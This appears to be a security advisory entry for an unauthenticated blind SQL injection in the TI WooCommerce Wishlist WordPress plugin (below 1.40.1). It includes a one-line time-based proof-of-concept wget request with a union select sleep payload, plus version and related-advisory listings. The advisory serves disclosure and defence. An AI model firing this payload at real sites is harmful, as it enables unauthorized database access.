Lucene search
Krzysztof ZającWPVDB-ID:E984BA11-ABEB-4ED4-9DAD-0BFD539A9682HistoryJan 31, 2022 - 12:00 a.m.
TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection
2022-01-3100:00:00
Krzysztof Zając
wpscan.com
14
0.085 Low
EPSS
Percentile
94.5%
The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks
PoC
time wget ‘https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item;_id=0 union select sleep(2) -- g’ Even though it will produce an error 400, the payload is processed and response delayed
| CPE | Name | Operator | Version |
|---|---|---|---|
| ti-woocommerce-wishlist | lt | 1.40.1 | |
| ti-woocommerce-wishlist-premium | lt | 1.40.1 |
Related
cve
cve
CVE-2022-0412
2022-02-28 09:15:09
patchstack
patchstack
prion
prion
Sql injection
2022-02-28 09:15:00
openvas
openvas
WordPress TI WooCommerce Wishlist Plugin < 1.40.1 SQLi Vulnerability
2022-03-14 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2022-0412
2022-02-28 09:15:09
cnvd
cnvd
WordPress TI WooCommerce Wishlist plugin SQL injection vulnerability
2022-03-02 00:00:00
nuclei
nuclei
WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
2022-10-01 13:34:58
githubexploit
githubexploit
Exploit for SQL Injection in Templateinvaders Ti Woocommerce Wishlist
2024-03-20 22:22:51
wpexploit
wpexploit
TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection
2022-01-31 00:00:00